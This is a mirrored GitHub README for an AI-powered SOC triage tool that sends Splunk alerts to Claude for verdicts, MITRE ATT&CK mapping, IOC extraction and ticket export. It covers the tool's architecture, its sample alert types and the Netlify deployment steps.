Qwortie/soc-triage-assistant

GitHub: Qwortie/soc-triage-assistant

一款AI驱动的Splunk告警智能分诊工具，自动化完成研判、MITRE映射、IOC提取与工单生成。

Stars: 0 | Forks: 0

# 🛡️ SOC Triage Assistant ![Status](https://img.shields.io/badge/Status-Active-brightgreen?style=flat-square) ![AI](https://img.shields.io/badge/AI-Claude-orange?style=flat-square) ![Deploy](https://img.shields.io/badge/Deploy-Netlify-00C7B7?style=flat-square) ![Framework](https://img.shields.io/badge/Framework-MITRE%20ATT%26CK-B22222?style=flat-square) An AI-powered SOC analyst tool that takes a Splunk alert — either pasted as raw JSON or entered via a structured form — and generates a complete triage report in seconds. Built to accelerate Tier-1 SOC workflows by automating the initial analysis step. **Live demo:** [soc-triage.netlify.app](https://soc-triage-qwort.netlify.app/) ## 🎯 它的作用 Paste a Splunk alert and get back: - **Verdict** — Confirmed Threat / Suspected Threat / Likely False Positive - **MITRE ATT&CK mapping** — tactic, technique, and ID with direct link - **IOC extraction** — all indicators defanged per threat intel standards - **Containment actions** — numbered, specific, immediately actionable - **Escalation decision** — should this go to the IR team? - **Analyst notes** — caveats and things to verify manually - **Exportable .md ticket** — ready to commit to your SOC ticket log ## 🏗️ 架构 ``` Browser (index.html) ↓ POST /alert data Netlify Function (triage.js) ← API key stored as env variable ↓ POST /v1/messages Claude API (claude-haiku) ↓ Structured JSON response Browser renders triage report ``` The Claude API key is never exposed in the browser — all API calls are proxied through a Netlify serverless function. ## 🧪 示例告警 The tool includes four preloaded sample alerts for demo purposes: | Sample | MITRE Technique | Event ID | |---|---|---| | Password Spray | T1110.003 | 4625 | | Kerberoasting | T1558.003 | 4769 | | Encoded PowerShell | T1059.001 | Sysmon EID 1 | | LSASS Memory Access | T1003.001 | Sysmon EID 10 | ## 🚀 部署 ### 先决条件 - Netlify account (free tier works) - Anthropic API key from [console.anthropic.com](https://console.anthropic.com) ### 步骤 1. Fork or clone this repo 2. Deploy to Netlify (drag and drop the folder, or connect via GitHub) 3. In Netlify → Site configuration → Environment variables, add: - Key: `ANTHROPIC_API_KEY` - Value: your API key 4. Trigger a redeploy ### 本地开发 ``` npm install -g netlify-cli netlify dev # 访问 http://localhost:8888 ``` ## 📁 仓库结构 ``` soc-triage-assistant/ ├── index.html # Frontend — form, JSON input, results UI ├── README.md └── netlify/ └── functions/ └── triage.js # Serverless proxy — calls Claude API ``` ## 🔗 相关仓库 - [SOC-Home-Lab](https://github.com/Qwortie/SOC-Home-Lab) — Lab environment these alerts come from - [splunk-detection-rules](https://github.com/Qwortie/splunk-detection-rules) — SPL rules that generate these alerts - [Phishing-tickets](https://github.com/Qwortie/Phishing-tickets) — Manual ticket format this tool automates

标签：AI 安全, API 密钥安全, Claude API, Cloudflare, IOC 提取, Kerberoasting, LSASS 内存访问, Markdown 导出, MITRE ATT&CK, MITRE 映射, Netlify, PowerShell 编码, SOAR, T1003, T1059, T1110, T1558, 二进制发布, 后端开发, 告警 triage, 威胁情报, 安全运营中心, 密码喷洒, 开发者工具, 开源工具, 数据可视化, 无服务器函数, 服务端代理, 样本告警, 模拟器, 浏览器端, 演示样本, 票证系统, 结构化表单, 网络映射, 自动化分析, 虚假阳性, 跨站脚本